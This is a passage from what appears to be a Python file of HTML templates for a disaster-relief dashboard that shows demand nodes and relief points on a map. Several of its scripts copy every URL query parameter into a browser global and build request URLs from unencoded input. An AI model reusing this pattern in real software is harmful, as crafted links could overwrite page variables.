<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
for(var k in display_data) {
let newRow = document.createElement("tr");
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
mytable.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been successfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
</script>
</div>
<div class="flex-container">
<div class="flex-child">
<table id = "main-data-table">
<tr>
<th>Reliability Value</th>
<th>Population Served</th>
<th>Population Unserved</th>
<th>Demand Nodes</th>
<th>Relief Points</th>
</tr>
</table>
<p>
Note: Negative values in column 'Population Unserved' show that there is space to accommodate that many people
</p>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script>
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, 'setdemand/?dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, 'setdemand/?dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, 'setdemand/?dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, 'setdemand/?dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, 'setdemand/?dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, 'setdemand/?dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, 'setdemand/?dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, 'setdemand/?dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, 'setrelief/?reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, 'setrelief/?reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, 'setrelief/?reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, 'setrelief/?reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, 'setrelief/?reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, 'setrelief/?reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, 'setrelief/?reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, 'setrelief/?reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand"){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
url: baseUrl.concat(Locations[i][4]),
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief"){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
url: baseUrl.concat(Locations[i][4]),
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
google.maps.event.addListener(marker, 'click', function() {
window.location.href = this.url;
window.open(marker.url, '_blank');
});
}
</script>
</body>
</html>
"""
# HTML page served for the per-demand-node view.
# The embedded script reads the ?dmnd= query parameter, filters the data table
# and map markers to that demand node, and links each reachable relief point
# to the /handler page. Fixes vs. the previous revision: user-facing typos
# ("accomodate", "sucessfully") and a marker click handler that navigated via
# the late-bound shared `marker` variable (always the last marker) while ALSO
# opening a second tab — it now navigates once via `this.url`.
demand_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' show that there is space to accommodate that many people
</p>
</div>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('dmnd').value = dmnd;
reli = [];
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][3] == dmnd){
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
newRow2.appendChild(cell2);
}
reli = [...reli,String(display_data[k][4])]
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been successfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
url: baseUrl+"handler/?dmnd="+dmnd+Locations[i][4],
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
google.maps.event.addListener(marker, 'click', function() {
// 'this' is the clicked marker; the shared 'marker' variable is late-bound
// and would always point at the last marker created.
window.location.href = this.url;
});
}
}
}
</script>
</body>
</html>
"""
# HTML page served for the per-relief-point view.
# The embedded script reads the ?reli= query parameter, filters the data table
# and map markers to that relief point, and links each matching demand node to
# the /handler page. Fixes vs. the previous revision: user-facing typos
# ("accomodate", "sucessfully") and a marker click handler that navigated via
# the late-bound shared `marker` variable (always the last marker) while ALSO
# opening a second tab — it now navigates once via `this.url`.
relief_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' show that there is space to accommodate that many people
</p>
</div>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('reli').value = reli;
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
dmnd = [];
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][4] == reli){
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
newRow2.appendChild(cell2);
}
dmnd = [...dmnd,String(display_data[k][3])]
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been successfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
url:baseUrl+"handler/?reli="+reli+Locations[i][4],
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
google.maps.event.addListener(marker, 'click', function() {
// 'this' is the clicked marker; the shared 'marker' variable is late-bound
// and would always point at the last marker created.
window.location.href = this.url;
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
}
}
</script>
</body>
</html>
"""
handler_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
#container {
height: 100%;
display: flex;
}
#sidebar {
flex-basis: 15rem;
flex-grow: 1;
padding: 1rem;
max-width: 30rem;
height: 100%;
box-sizing: border-box;
overflow: auto;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls" onclick="submitFunction()">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' show that there is space to accommodate that many people
</p>
</div>
</div>
<div class="second_child">
<div id="container">
<div id="map">
</div>
<div id="sidebar">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY&callback=initDirMap&v=weekly" type="text/javascript">
</script>
</div>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
<td><canvas id="myCanvas3">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Reliability Gradient<br>Red:low Green:high</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
var c3 = document.getElementById("myCanvas3");
var ctx3 = c3.getContext("2d");
ctx3.canvas.width = "100"
ctx3.canvas.height = "50"
var grd = ctx3.createLinearGradient(0,0,c.width,0);
grd.addColorStop(0,"red");
grd.addColorStop(0.5,"yellow");
grd.addColorStop(1,"green");
// Fill with gradient
ctx3.fillStyle = grd;
ctx3.fillRect(c.width/10,c.width/10,c.width/1.2,c.width/3);
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('dmnd').value = dmnd;
document.getElementById('reli').value = reli;
